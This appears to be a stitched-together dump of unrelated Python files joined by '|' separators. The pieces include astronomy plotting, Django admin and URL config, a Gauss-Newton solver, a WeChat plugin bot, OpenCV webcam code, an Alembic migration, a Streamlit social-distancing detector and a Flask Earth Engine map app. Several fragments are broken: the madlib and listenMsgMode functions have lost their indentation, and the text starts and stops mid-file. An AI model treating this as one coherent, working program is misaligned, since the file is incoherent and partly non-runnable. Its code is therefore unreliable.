abs_G = distance_modulus(df['Gaia_G'].tail(tail_val),dist_vega)
abs_BP = distance_modulus(df['Gaia_BP'].tail(tail_val),dist_vega)
abs_RP = distance_modulus(df['Gaia_RP '].tail(tail_val),dist_vega)
#we then move the isochrones so that they better fir the HR
#bp_rp = (abs_BP - abs_RP) +0.55
#abs_G = abs_G +2
bp_rp = df['Gaia_BP'].tail(250) -df['Gaia_RP '].tail(250)
app_g = df['Gaia_G'].tail(250)
bp_rp = (bp_rp) +0.55
app_g = app_g +12.6
#plot
plt.figure(3)
plt.plot(bp_rp,app_g,'-',markersize=5,label='ZAMS')
plt.plot(gaia_results['bp_rp'],gaia_results['phot_g_mean_mag'],'.',color = 'black',alpha=0.6,markersize = 1.5,label='M4 HR-Diagram')
plt.gca().invert_yaxis()
plt.ylabel('G mag')
plt.xlabel('BP - RP mag')
plt.title('HR Diagram of M4 with Fitted Isochrones')
plt.legend()
plt.savefig('gaia_m4_isoschrones_fitted.png')
plt.close()
|
from django.contrib import admin
from django.contrib.auth.admin import UserAdmin
# Register your models here.
from .models import Customer, Addresses, Management, User, Staff, UserProfile, UserDefaultAddress
class AddressesInline(admin.TabularInline):
    # Inline address editor embedded in the Customer change page.
    model = Addresses
    # raw_id widget avoids loading every user into a select box.
    raw_id_fields = ('user',)
    search_fields = ('user',)
@admin.register(Customer)
class CustomerAdmin(admin.ModelAdmin):
    """Admin for customer accounts (presumably a proxy of User — confirm)."""
    list_display = ['first_name', 'last_name', 'email']
    inlines = (AddressesInline,)
    search_fields = ('first_name',)
    ordering = ('email',)
    fieldsets = (
        ('information', {'fields': ('email', 'first_name', 'last_name', 'phone', 'password')}),
        ('permissions', {'fields': ('is_active','groups', 'user_permissions',)}),
    )

    # NOTE(review): ModelAdmin does not read an inner Meta.model — this
    # declaration has no effect here.
    class Meta:
        model = User

    def get_queryset(self, request):
        # Limit the changelist to non-staff accounts.
        # NOTE(review): bypasses super().get_queryset(request), so the
        # admin's default ordering/annotations are not applied — confirm.
        return User.objects.filter(is_staff=False)
@admin.register(Management)
class ManagementAdmin(admin.ModelAdmin):
    """Admin for management accounts: superusers."""
    list_display = ['first_name', 'email']
    search_fields = ('first_name',)
    ordering = ('email',)
    fieldsets = (
        ('information',{'fields': ('email', 'first_name', 'last_name', 'phone', 'password')}),
        ('permissions', {'fields': ('is_staff','is_superuser','groups', 'user_permissions',)}),
    )
    # Removed the dead inner ``class Meta`` — ModelAdmin ignores it.
    def get_queryset(self, request):
        # Management view shows superusers only.
        return User.objects.filter(is_superuser=True)
@admin.register(Staff)
class StaffAdmin(admin.ModelAdmin):
    """Admin for staff accounts: users with is_staff set."""
    list_display = ['first_name', 'email']
    search_fields = ('first_name',)
    ordering = ('email',)
    fieldsets = (
        ('information', {'fields': ('email', 'first_name', 'last_name', 'phone', 'password')}),
        ('permissions', {'fields': ('is_staff', 'is_superuser', 'groups', 'user_permissions',)}),
    )
    # Removed the dead inner ``class Meta`` — ModelAdmin ignores it.
    def get_queryset(self, request):
        # NOTE(review): this also includes superusers (who usually have
        # is_staff=True), so accounts can appear in both Staff and Management
        # lists — confirm that is intended.
        return User.objects.filter(is_staff=True)
@admin.register(UserProfile)
class UserProfileAdmin(admin.ModelAdmin):
    # Minimal admin: list and search profiles by full name.
    list_display = ('full_name',)
    search_fields = ('full_name',)
@admin.register(UserDefaultAddress)
class UserDefaultAddressAdmin(admin.ModelAdmin):
    # Minimal admin: list and search default addresses by owning user.
    list_display = ('user',)
    search_fields = ('user',)
def madlib():
person = input("person: ")
adjective1 = input("adjective: ")
adjective2 = input("adjective: ")
noun1 = input("noun: ")
adjective3 = input("adjective: ")
noun2 = input("noun: ")
adjective4 = input("adjective: ")
verb1 = input("verb: ")
verb2 = input("verb: ")
verb3 = input("verb: ")
madlib = f"Yesterday, {person} and I went to the park, On our way to the {adjective1} park, we saw a {adjective2} \
{noun1} on a bike. We also saw big {adjective3} balloons tied to a {noun2}. Once we got to the {adjective1} park, \
the sky turned {adjective4}. It started to {verb1} and {verb2} {person} and I {verb3} all the way home. \
Tomorrow we will try to go to the {adjective1} park again and hope it doesn't {verb1}"
print(madlib) |
# -*- coding: utf-8 -*-
# URLconf using the pre-Django-1.10 ``patterns()`` helper (removed in Django
# 1.10); string view names like 'list' are resolved against the given prefix.
from django.conf.urls import patterns, url
from django.conf import settings
from django.conf.urls.static import static
'''
urlpatterns = patterns('',
# ... the rest of your URLconf goes here ...
) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
'''
# static() serves MEDIA_URL through Django in development; it is a no-op when
# DEBUG is False.
urlpatterns = patterns('myproject.myapp.views',
url(r'^list/$', 'list', name='list'),
)+ static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
|
from numpy import *
def GN(res, x):  # Residual minimization for nonlinear least squares problems
    """Gauss-Newton iteration: minimise ||res(x)||^2, updating ``x`` in place.

    Runs a fixed 10 iterations.  Each step solves the normal equations
    (J^T J) s = -J^T r for the step s, where J is the Jacobian of ``res``.

    Bug fixes vs the original: the solve referenced the undefined name
    ``DRTDR`` (a NameError), and its right-hand side was ``-DR`` instead of
    the correct ``-J^T r``.
    """
    for _ in range(10):
        DR = cdjac(res, x)          # Jacobian, shape (m residuals, n unknowns)
        DRT = DR.T
        DRTDR = dot(DRT, DR)        # n x n normal-equations matrix
        s = linalg.solve(DRTDR, -dot(DRT, res(x)))
        x += s


def cdjac(f, x):
    """Return the central-difference Jacobian of ``f`` at ``x``.

    Shape is (m, n) for m residuals and n unknowns — the original
    allocated (n, n) and broke for non-square problems.  The step size
    follows the usual eps**(1/3)*||x||_inf rule, with a fallback so the
    step is nonzero when x == 0.
    """
    eps = finfo(type(x[0])).eps  # machine epsilon from numpy
    delta = eps**(1.0/3.0)*linalg.norm(x, inf)
    if delta == 0.0:
        delta = eps**(1.0/3.0)   # x is the zero vector; avoid a zero step
    xplus = x.copy()
    xminus = x.copy()
    n = x.shape[0]
    m = f(x).shape[0]
    df = empty((m, n))
    for i in range(n):
        xplus[i] += delta        # perturb one component
        xminus[i] -= delta
        df[:, i] = (f(xplus) - f(xminus))/(2*delta)
        xplus[i] = x[i]          # reset perturbed component
        xminus[i] = x[i]
    return df
# Residuals: distances from the point x to three fixed circles (centre, radius);
# the Gauss-Newton solution is the point that best "touches" all three.
res = lambda x: array([\
sqrt((x[0]+1)**2.+x[1]**2.)-1,\
sqrt((x[0]-1)**2.+(x[1]-0.5)**2.)-0.5,\
sqrt((x[0]-1)**2.+(x[1]+0.5)**2.)-0.5])
x = array([0,0.])
# GN mutates x in place; the result is left in x.
GN(res,x)
|
# encoding:utf-8
__author__ = 'hanzhao'
import weixin
import multiprocessing
import logging
import time
import os
import json
#
def plugin_name():
    """Return the module names of every plugin in the ``plugins`` directory.

    A plugin is any ``*.py`` file whose name does not start with an
    underscore; returned names have the ``.py`` suffix stripped.
    """
    return [entry[:-3]
            for entry in os.listdir("plugins")
            if entry.endswith(".py") and not entry.startswith("_")]
# Discover available plugins once at import time (Python 2 script).
plugin_list = plugin_name()
print plugin_list
class PluginManager(object):
    """Per-chat plugin configuration persisted in config/plug_config.json.

    The JSON file maps a chat id (decoded group name, or a user's
    attr-status string) to {"plugin_on": [...]}, the enabled plugin names.
    """
    def load_config(self, id):
        """
        Return the list of enabled plugins for ``id``.

        Falls back to the 'default' entry when the id is unknown or the
        stored entry is malformed.
        :type id: str or unicode
        """
        with open('config/plug_config.json',"r") as f:
            try:
                config = json.load(f)[id]['plugin_on']
                print 'have'
                print config
            except:
                # Bare except: any missing key / parse error falls back to defaults.
                config = json.load(open('config/plug_config.json',"r"))['default']['plugin_on']
        return config
    def open_plugin(self,id,plugname):
        """Enable ``plugname`` for chat ``id``.

        Returns 1 on success, 2 when it was already enabled, and None when
        the plugin does not exist at all.
        """
        if plugname in plugin_list:
            with open('config/plug_config.json',"r") as f:
                raw_config = json.load(f)
                if id in raw_config:
                    old_config = raw_config[id]
                    if plugname in raw_config[id]['plugin_on']:
                        pass
                    else:
                        old_config['plugin_on'].append(plugname)
                        raw_config[id]['plugin_on'] = old_config['plugin_on']
                        fp = open('config/plug_config.json',"w")
                        fp.write(json.dumps(raw_config))
                        return 1
                else:
                    # First configuration for this chat: start from the defaults.
                    old_config = {"plugin_on":["base","rubik_tool","rubik_scramble"]}
                    old_config['plugin_on'].append(plugname)
                    raw_config[id] = old_config
                    fp = open('config/plug_config.json',"w")
                    fp.write(json.dumps(raw_config))
                    return 1
            return 2
        return None
    def close_plugin(self,id,plugname):
        """Disable ``plugname`` for chat ``id`` ('base' can never be disabled).

        Returns 1 on success, 2 when it was not enabled, and None for an
        unknown or protected plugin.
        """
        if plugname in plugin_list and plugname!='base':
            with open('config/plug_config.json',"r") as f:
                raw_config = json.load(f)
                print raw_config
                if id in raw_config:
                    old_config = raw_config[id]
                    if plugname in old_config['plugin_on']:
                        plugarr = old_config['plugin_on']
                        plugarr.remove(plugname)
                        raw_config[id]['plugin_on'] = plugarr
                        fp = open('config/plug_config.json',"w")
                        fp.write(json.dumps(raw_config))
                        return 1
                else:
                    # Unknown chat: derive its entry from the defaults minus the plugin.
                    if plugname in ["base","rubik_tool","rubik_scramble"]:
                        plugarr = ["base","rubik_tool","rubik_scramble"]
                        plugarr.remove(plugname)
                        new_config ={"plugin_on":plugarr}
                        raw_config[id] = new_config
                        fp = open('config/plug_config.json',"w")
                        fp.write(json.dumps(raw_config))
                        return 1
            return 2
        return None
# Module-level singletons: the plugin manager plus a logged-in web WeChat session.
plugmanager =PluginManager()
# plugmanager.close_plugin('ff','rubik_tool')
weiwx = weixin.WebWeixin()
weiwx.start()
def handlemsg(r):
    """Dispatch each new message in a webwxsync payload through the enabled plugins.

    Only text messages (MsgType 1) are handled; a plugin's non-None answer is
    sent back to the originating chat.  Answers starting with 'command' are
    interpreted as plugin-management commands first.
    """
    for msg in r['AddMsgList']:
        print '[*] 你有新的消息,请注意查收'
        logging.debug('[*] 你有新的消息,请注意查收')
        # if True:
        #     fn = 'msg' + str(int(random.random() * 1000)) + '.json'
        #     with open(fn, 'w') as f:
        #         f.write(json.dumps(msg))
        #     print '[*] 该消息已储存到文件: ' + fn
        #     logging.debug('[*] 该消息已储存到文件: %s' % (fn))
        msgType = msg['MsgType']
        srcName = weiwx.getUserRemarkName(msg['FromUserName'])
        dstName = weiwx.getUserRemarkName(msg['ToUserName'])
        # NOTE(review): as written these replaces are no-ops ('<'->'<');
        # presumably the original unescaped '&lt;'/'&gt;' — confirm.
        content = msg['Content'].replace('<', '<').replace('>', '>')
        msgid = msg['MsgId']
        # if msgType == 1:
        #     cc = weiwx.getNameById(msg['FromUserName'])
        #     print cc
        if msgType == 1:
            # Text message: work out which per-chat config key applies.
            # if '<br/>' in content:
            #     [name,content] = content.split('<br/>')
            if msg['FromUserName'][:2] == '@@':
                # Group chat ('@@' prefix): key by the decoded group name —
                # must decode here or later matching fails.
                config_save_name = weiwx.getGroupName(msg['FromUserName']).decode('utf')
            else:
                config_save_name = str(weiwx.getAttrStatusById(msg['FromUserName']))
            print config_save_name
            plugin_list_user_or_group = plugmanager.load_config(config_save_name)
            print plugin_list_user_or_group
            for plug in plugin_list_user_or_group:
                plugin=__import__("plugins."+plug, fromlist=[plug])
                ans = plugin.run(content)
                if ans is not None : # plugin management / reply section
                    if ans.startswith('command'):
                        print ans
                        if ans == 'command list plugin':
                            ans = str(plugmanager.load_config(config_save_name))
                        elif ans.startswith('command open plugin'):
                            plugname = ans.split(':')[1]
                            status = plugmanager.open_plugin(config_save_name,plugname)
                            if status == 1:
                                ans = '插件' + plugname + '成功开启'
                            else:
                                ans ='插件' + plugname + '开启失败'
                        elif ans.startswith('command close plugin'):
                            plugname = ans.split(':')[1]
                            status = plugmanager.close_plugin(config_save_name,plugname)
                            if status == 1:
                                ans = '插件' + plugname + '成功删除'
                            else:
                                ans ='插件' + plugname + '关闭失败'
                        else:
                            pass
                    weiwx.webwxsendmsg(ans, msg['FromUserName'])
def listenMsgMode(wx):
print '[*] 进入消息监听模式 ... 成功'
logging.debug('[*] 进入消息监听模式 ... 成功')
wx._run('[*] 进行同步线路测试 ... ', wx.testsynccheck)
playWeChat = 0
redEnvelope = 0
while True:
lastCheckTs = time.time()
[retcode, selector] = wx.synccheck()
print 'retcode: %s, selector: %s' % (retcode, selector)
if retcode == '1100':
print '[*] 你在手机上登出了微信,债见'
logging.debug('[*] 你在手机上登出了微信,债见')
break
elif retcode == '1101':
print '[*] 你在其他地方登录了 WEB 版微信,债见'
logging.debug('[*] 你在其他地方登录了 WEB 版微信,债见')
break
elif retcode == '0':
if selector == '2'or '6':
r = wx.webwxsync()
if r is not None:
handlemsg(r)
elif selector == '7':
playWeChat += 1
print '[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat
logging.debug('[*] 你在手机上玩微信被我发现了 %d 次' % playWeChat)
r = wx.webwxsync()
elif selector == '0':
time.sleep(1)
# if (time.time() - lastCheckTs) <= 10:
# time.sleep(10 - time.time() + lastCheckTs)
print str(time.time()-lastCheckTs)
# Enter the blocking listen loop with the session created above.
listenMsgMode(weiwx)
|
#!/usr/bin/env python
import time as time
import numpy as np
import cv2
from pkg_resources import parse_version
# Global tuning knobs for the capture loop.
display = True  # show annotated frames in a window
width = 640     # assumed frame width in pixels (used by boundingBoxes)
height = 480    # assumed frame height in pixels
ntries = 10     # samples averaged per measurement
jitter = 1      # cv2.waitKey delay in milliseconds
# True when the installed OpenCV is version 3 or newer (property names changed).
OPCV3 = parse_version(cv2.__version__) >= parse_version('3')
# returns OpenCV VideoCapture property id given, e.g., "FPS"
def vidProperty(prop):
    """Map a short name like "FPS" to this cv2 version's capture-property constant."""
    if OPCV3:
        return getattr(cv2, "CAP_PROP_" + prop)
    return getattr(cv2.cv, "CV_CAP_PROP_" + prop)
def XXXgetContours( image ):
    """Unused variant: blur + Otsu threshold + contour extraction (kept for reference)."""
##    blur = cv2.pyrMeanShiftFiltering( image, 21, 36 )
    blur = cv2.GaussianBlur(image, (5, 5), 0)
    gray = cv2.cvtColor( blur, cv2.COLOR_BGR2GRAY )
    ret, threshold = cv2.threshold( gray, 0, 255, cv2.THRESH_BINARY+cv2.THRESH_OTSU )
    # NOTE(review): the 2-value unpack matches OpenCV 2/4; OpenCV 3 returns
    # (image, contours, hierarchy) — confirm against the installed version.
    rv,z = cv2.findContours( threshold, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE )
    return rv
def getContours( image ):
    """Return the contour tree of ``image`` after a fixed 127 binary threshold."""
    # threshold image
    ret, threshed_img = cv2.threshold(cv2.cvtColor(image, cv2.COLOR_BGR2GRAY), 127, 255, cv2.THRESH_BINARY)
    # find contours and get the external one
    contours, hier = cv2.findContours(threshed_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
    return contours
def showContours( image, lst ):
    """Draw every contour in ``lst`` in green on ``image`` when display is on.

    Returns the drawn image, or None when display is disabled.
    """
    if not display:
        return None
    return cv2.drawContours( image, lst, -1, (0,255,0), 2 )
def writeText( image, at, txt, colour ):
    """Draw ``txt`` on ``image`` at point ``at`` in BGR ``colour`` (black if None)."""
    # Idiom fix: test None with ``is``, not ``==`` (which invokes __eq__ and
    # can misbehave for array-like colours).
    if colour is None:
        colour = (0,0,0)
    font = cv2.FONT_HERSHEY_SIMPLEX
    cv2.putText( image, txt, at, font, 0.4, colour, 2 )
def boundingCircles( image, clist ):
    """Draw the minimum enclosing circle of each contour, labelled with its radius.

    Circles with radius outside (20, 200) are ignored as noise.
    """
    # Removed the original's ``ix`` counter — it was incremented but never read.
    for c in clist:
        (x,y),rad = cv2.minEnclosingCircle( c )
        centre = (int(x),int(y))
        radius = int( rad )
        if radius > 20 and radius < 200:
            cv2.circle( image, centre, radius, (0,255,0), 2 )
            txt = "R=%s" % radius
            writeText( image, centre, txt, (0,255,0) )
def boundingBoxes( image, clist ):
    """Return (x, y, w, h) bounding rects for contours that look person-sized."""
    rv = []
    for c in clist:
        x,y,w,h = cv2.boundingRect(c)
        # Skip boxes spanning most of the frame (likely background).
        # NOTE(review): reads the module-level width/height (640x480); webCam()
        # only assigns locals of the same names — confirm that is intended.
        if h > (int(0.8*height)) or w > int(width/2):
            continue
        # Keep only boxes big enough to be an object of interest.
        if w > 40 and h > 80:
            rv.append( (x,y,w,h) )
    return rv
def webCam( num ):
    """Open capture device ``num``, log its properties, tune it, return the stream.

    Exits the process when the device cannot be opened.
    """
    stream = cv2.VideoCapture( num )
    if stream.isOpened() == False:
        print "Cannot open input video stream!"
        exit()
    # NOTE(review): these bind *local* names, shadowing the module-level
    # width/height used by boundingBoxes — confirm that is intended.
    height = stream.get( vidProperty( 'FRAME_HEIGHT' ) )
    width = stream.get( vidProperty( 'FRAME_WIDTH' ) )
    sat = stream.get( vidProperty( 'SATURATION' ) )
    con = stream.get( vidProperty( 'CONTRAST' ) )
    fps = stream.get( vidProperty( 'FPS' ) )
    print "camera opened: image size ", width, "x", height
    print "sat: %s con: %s fps: %s" % ( sat, con, fps )
##    stream.set( vidProperty( 'FRAME_HEIGHT' ), int( height/2 ) )
##    stream.set( vidProperty( 'FRAME_WIDTH' ), int( width/2 ) )
    # Empirically chosen tweaks: cap FPS, halve saturation, double contrast.
    stream.set( vidProperty( 'FPS' ), 27 )
    stream.set( vidProperty( 'SATURATION' ), sat/2 )
    stream.set( vidProperty( 'CONTRAST' ), con*2 )
    return stream
def getFrame( stream ):
    """Return the next frame from ``stream``, or None when the read fails."""
    ok, frame = stream.read()
    return frame if ok else None
def show( image ):
    """Display ``image`` in the window; return True when the user pressed 'q'."""
    if not display:
        return False
    cv2.imshow( 'Display',image )
    # BUG FIX: the original compared the waitKey int against the *string* 'q'
    # (``... & 0xff == 'q'``), which is always False, so quitting never worked.
    if cv2.waitKey(jitter) & 0xff == ord('q'):
        return True
    return False
def save( image, file ):
    """Write ``image`` to ``file`` (format inferred from the extension)."""
    cv2.imwrite( file, image )
def obatts( bx ):
    """Unpack the first four entries of a bounding box as the tuple (x, y, w, h)."""
    x, y, w, h = bx[0], bx[1], bx[2], bx[3]
    return (x, y, w, h)
def getObjects( cam ):
    """Grab one frame and return the (w, h) of each plausible object box.

    When display is on, also draws labelled rectangles and shows the frame;
    exits the whole process when the user quits the display window.
    """
    # Retry until a frame and its contours are successfully obtained.
    frame = None
    while frame is None:
        frame = getFrame( cam )
    contours = None
    while contours is None:
        contours = getContours( frame )
    bbxs = boundingBoxes( frame, contours )
    rv = []
    for bx in bbxs:
        x,y,w,h = obatts( bx )
        rv.append( (w,h) )
        if display:
            txt = "(%d x %d)" % (w,h)
            cv2.rectangle( frame, (x,y), (x+w,y+h), (0,223,0), 2 )
            writeText( frame, (int(x+(w/4)),int(y+(h/2))), txt, (0,223,0) )
    if show( frame ):
        exit( 0 )
    return rv
def deJitter( cam, n ):
    """Average object sizes over ``n`` samples to smooth per-frame jitter.

    Returns a list of (mean width, mean height), one per object index.
    """
    x = {}  # object index -> accumulated widths
    y = {}  # object index -> accumulated heights
    ix = n
    while ix > 0:
        ix -= 1
        ob = getObjects( cam )
        i = 0
        while i < len( ob ):
            if i in x:
                x[i] += ob[i][0]
                y[i] += ob[i][1]
            else:
                x[i] = ob[i][0]
                y[i] = ob[i][1]
            i += 1
    i = 0
    rv = []
    # NOTE(review): dividing by n assumes every object index appeared in all
    # n samples; indices seen in fewer frames are under-averaged — confirm.
    while i < len( x ):
        t = ( int( x[i]/n ), int( y[i]/n ) )
        rv.append( t )
        i += 1
    return rv
def getSize( cam, n ):
    """Average the first bounding box's (x, y) over ``n`` detecting samples.

    Returns a single-element list [(mean x, mean y)].
    """
    x = 0
    y = 0
    ix = n
    rv = []
    while ix > 0:
        # Retry until a frame and its contours are obtained.
        frame = None
        while frame is None:
            frame = getFrame( cam )
        contours = None
        while contours is None:
            contours = getContours( frame )
        bb = boundingBoxes( frame, contours )
        if len( bb ) > 0:
            # Only samples that actually detected something count towards n.
            x += bb[0][0]
            y += bb[0][1]
            ix -= 1
        if show( frame ):
            exit( 0 )
    rv.append( ( int(x/n), int(y/n) ) )
    return rv
def main():
    """Benchmark the camera's frame rate, then continuously sample objects."""
    cam = webCam( 0 )
    start = time.time()
    # Warm-up / throughput benchmark over 30 frames.
    for ix in range( 30 ):
        frame = getFrame( cam )
    end = time.time()
    print "30 frames in %s seconds." % str( end - start )
    while True:
        start = time.time()
##        box = getSize( cam, ntries )
        ob = deJitter( cam, ntries )
        bbx = time.time()
        print "%d objects sampled %s times %s %s." % ( len( ob ), ntries, ob, str( bbx - start ) )
##        print "bbx calc: %s %s" % ( str( bbx - start ), box )
##        boundingCircles( frame, contours )
        # NOTE(review): ``frame`` is still the last warm-up frame, not one
        # from the sampling loop — confirm this is intended.
        save( frame, 'save.jpg' )
    # NOTE(review): unreachable — the loop above never breaks.
    cv2.destroyAllWindows()
if __name__ == "__main__":
    main()
|
"""Add message status and payload
Revision ID: 19e4d92b2bef
Revises: 4bd072d67d85
Create Date: 2020-04-16 12:34:03.014993
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '19e4d92b2bef'        # this migration
down_revision = '4bd072d67d85'   # migration this one builds on
branch_labels = None
depends_on = None
def upgrade():
    """Replace per-field message columns with a JSON payload and a status enum."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column('message', sa.Column('payload', sa.JSON(), nullable=True))
    # native_enum=False stores the status as a VARCHAR with a CHECK constraint.
    op.add_column('message', sa.Column('status', sa.Enum('received', 'confirmed', 'revoked', 'undeliverable', name='messagestatus', native_enum=False), nullable=True))
    # Dropping these columns is lossy: downgrade() restores the columns but not the data.
    op.drop_column('message', 'predicate')
    op.drop_column('message', 'obj')
    op.drop_column('message', 'subject')
    op.drop_column('message', 'receiver')
    op.drop_column('message', 'sender')
    # ### end Alembic commands ###
def downgrade():
    """Restore the old per-field columns (empty) and drop payload/status."""
    # ### commands auto generated by Alembic - please adjust! ###
    op.add_column('message', sa.Column('sender', sa.VARCHAR(length=8), autoincrement=False, nullable=True))
    op.add_column('message', sa.Column('receiver', sa.VARCHAR(length=8), autoincrement=False, nullable=True))
    op.add_column('message', sa.Column('subject', sa.VARCHAR(length=1024), autoincrement=False, nullable=True))
    op.add_column('message', sa.Column('obj', sa.VARCHAR(length=1024), autoincrement=False, nullable=True))
    op.add_column('message', sa.Column('predicate', sa.VARCHAR(length=1024), autoincrement=False, nullable=True))
    op.drop_column('message', 'status')
    op.drop_column('message', 'payload')
    # ### end Alembic commands ###
|
import streamlit as st
import detection as dtc
import imutils
import datetime
import cv2
import os
import pandas as pd
import torch
# GUI header
# Streamlit runs this module top-to-bottom on every UI interaction.
st.set_page_config("Social Distancing Detector", None, "wide")
st.title('Automated Social Distancing Monitoring System :walking::walking:')
st.subheader('COS30018 Assignment Project Topic 3 - Social Distancing Monitoring System')
st.write("Do you want to use NVIDIA CUDA GPU? :desktop_computer:")
cuda = st.selectbox('', ('No', 'Yes'))
if cuda == "Yes":
    print(1)
    # Load the custom YOLOv5 weights and move the model onto the first GPU.
    model = torch.hub.load('ultralytics/yolov5', 'custom', path = 'weights/best.pt')
    model.cuda('cuda:0')
elif cuda == "No":
    print(0)
    model = torch.hub.load('ultralytics/yolov5', 'custom', path = 'weights/best.pt')
st.write("")
st.write("Minimum confidence for the model to detect human")
MIN_CONF = st.slider('', 0.0, 1.0, 0.7)
st.subheader('Image detector :frame_with_picture:')
st.write('Upload your image to be analysed')
st.write('Note: Make sure the file is located in the images folder')
img = st.file_uploader('Image')
MIN_CONF = float(MIN_CONF)
DISTANCE = 40  # minimum allowed distance between people (detector units)
if img is not None:
    # NOTE(review): only the uploaded *name* is used; the file itself must
    # already exist under images/ — confirm this workflow is intended.
    path = img.name
    img = cv2.imread('images/' + path)
    img, violation = dtc.bird_detect_people_on_frame(img, MIN_CONF, DISTANCE, img.shape[1], img.shape[0], model)
    st.success("Image successfully analysed")
    st.image(img, caption='Image detection result')
st.subheader('Video detector :film_frames:')
st.write('Upload your video to be analysed')
st.write('Note: Make sure the file is located in the videos folder')
vid = st.file_uploader('Video')
if vid is not None:
    path = vid.name
    vid = "videos/" + path
    video = cv2.VideoCapture(vid)
    frame_count = int(video.get(cv2.CAP_PROP_FRAME_COUNT))
    violations = dtc.bird_detect_people_on_video(vid, MIN_CONF, DISTANCE, model)
    path = 'bird_output.avi'
    compressed_path = path.split('.')[0]
    compressed_path = 'compressed_' + compressed_path + '.mp4'
    if os.path.exists(compressed_path):
        os.remove(compressed_path)
    # Convert video to browser-friendly H.264 MP4 via ffmpeg.
    os.system(f"ffmpeg -i {path} -vcodec libx264 -nostdin {compressed_path} ")
    print(compressed_path)
    st.success("Video successfully analysed")
    st.video('compressed_bird_output.mp4', 'video/mp4', 0)
    # add graphs: per-frame violation counts
    FPS = video.get(cv2.CAP_PROP_FPS)
    data = pd.DataFrame({'Violations':violations})
    st.subheader('Violations for each frame in the video :warning:')
    st.line_chart(data, height = 500)
st.info("Design & Developed By MACE For COS30018 Intelligent Systems Assignment")
|
from flask import Flask, render_template, request
# importing the earth engine
import ee
# Authenticate/initialise Earth Engine at import time; raises without credentials.
ee.Initialize()
from IPython.display import Image,display
from datetime import date , timedelta
from datetime import datetime
import folium
import pygeoj
app = Flask(__name__)
@app.route('/')
def index():
    """Render the landing page with the layer/date selection form."""
    return render_template('index.html')
@app.route('/',methods=['POST'])
def calculate():
    """Handle the form POST: compute an Earth Engine tile URL for the chosen layer.

    Supported layers: NDVI, NDBI, NDWI (Landsat-8 TOA composites), DEM,
    slope, and Hansen forest change.  The tile URL is handed back to the
    template for the map widget.
    """
    start_date = request.form['startdate']
    end_date = request.form['enddate']
    data = request.form['data']
    '''geometry = request.form['polygon']
    a = pygeoj.load(geometry)
    for feature in a:
        roi = (feature.geometry.coordinates)
    region = ee.Geometry.MultiPolygon(roi)
    print(region)'''
    def ndvi(start_date,end_date):
        # Median Landsat-8 TOA composite with <20% cloud cover;
        # NDVI = (NIR - Red) / (NIR + Red) using bands B5/B4.
        image = ee.ImageCollection('LANDSAT/LC08/C01/T1_TOA').filterDate(start_date,end_date).filterMetadata('CLOUD_COVER','less_than',20).median()
        print(image)
        nir = image.select('B5')
        red = image.select('B4')
        ndvi = nir.subtract(red).divide(nir.add(red))
        viz_parameter = {'min':-0.4,'max':0.5,'palette': ['blue','white','DarkGreen']}
        map_id_dict = ee.Image(ndvi).getMapId(viz_parameter)
        tile = str(map_id_dict['tile_fetcher'].url_format)
        print(tile)
        return tile
    def dem():
        # SRTM 30m digital elevation model.
        image = ee.Image("USGS/SRTMGL1_003")
        viz_parameter = {'min':0,'max':3000,'palette': ['white','black','red']}
        map_id_dict = ee.Image(image).getMapId(viz_parameter)
        tile = str(map_id_dict['tile_fetcher'].url_format)
        print(tile)
        # return "hi i calaculated"
        return tile
    def ndbi(start_date,end_date):
        # Built-up index: (SWIR - NIR) / (SWIR + NIR) using bands B6/B5.
        image = ee.ImageCollection('LANDSAT/LC08/C01/T1_TOA').filterDate(start_date,end_date).filterMetadata("CLOUD_COVER",'less_than',10).median()
        swir = image.select('B6')
        nir = image.select('B5')
        ndbi = swir.subtract(nir).divide(swir.add(nir))
        viz_parameter = {'min':-0.6,'max':0.2,'palette': ['blue','008000','red']}
        map_id_dict = ee.Image(ndbi).getMapId(viz_parameter)
        tile = str(map_id_dict['tile_fetcher'].url_format)
        return tile
    def ndwi(start_date,end_date):
        # Water index: (Green - SWIR) / (Green + SWIR) using bands B3/B6.
        image = ee.ImageCollection('LANDSAT/LC08/C01/T1_TOA').filterDate(start_date,end_date).filterMetadata("CLOUD_COVER",'less_than',10).median()
        GREEN = image.select("B3")
        SWIR = image.select("B6")
        ndwi_image = GREEN.subtract(SWIR).divide(GREEN.add(SWIR))#calculate the ndwi
        viz_parameter = {'min':-0.4,'max':0.5,'palette': ['green','red','blue']}
        map_id_dict = ee.Image(ndwi_image).getMapId(viz_parameter)
        tile = str(map_id_dict['tile_fetcher'].url_format)
        print(tile)
        return tile
    def slope():
        # Terrain slope in degrees derived from the SRTM DEM.
        image = ee.Image("USGS/SRTMGL1_003")
        slope = ee.Terrain.slope(image)
        viz_parameter = {'min':0,'max':60,'palette': ['white','black','red']}
        map_id_dict = ee.Image(slope).getMapId(viz_parameter)
        tile = str(map_id_dict['tile_fetcher'].url_format)
        print(tile)
        return tile
    def forest():
        # Hansen global forest change 2000-2019.
        forest_image = ee.Image("UMD/hansen/global_forest_change_2019_v1_7")
        forest_visual = {'bands': ['loss', 'treecover2000', 'gain'],'max': [1, 255, 1]}
        map_id_dict = ee.Image(forest_image).getMapId(forest_visual)
        # forest loss as red, and forest gain as blue
        tile = str(map_id_dict['tile_fetcher'].url_format)
        return tile
    # Dispatch on the requested layer; DEM is the fallback.
    if (data == 'ndvi'):
        data1 = ndvi(start_date, end_date)
        return render_template('index.html',tiles = data1, title = 'NDVI')
    elif (data == 'ndbi'):
        data1 = ndbi(start_date,end_date)
        return render_template('index.html',tiles=data1, title = 'NDBI')
    elif (data == 'ndwi'):
        data1 = ndwi(start_date,end_date)
        return render_template('index.html',tiles=data1, title = 'NDWI')
    elif(data == 'dem'):
        data1=dem()
        return render_template('index.html',tiles=data1, title = 'DEM')
    elif(data == 'slope'):
        data1 = slope()
        return render_template('index.html',tiles = data1, title = 'SLOPE')
    elif(data == 'forest'):
        data1 = forest()
        return render_template('index.html',tiles = data1, title = 'Forest Change')
    else:
        data1=dem()
        return render_template('index.html',tiles=data1)
if __name__ == "__main__":
    # Development server only; use a proper WSGI server in production.
    app.run(debug=True)
from datetime import date
from uuid import uuid4
from onegov.ballot import ElectionCompound, Election
from onegov.core.utils import module_path
from tests.onegov.election_day.common import login
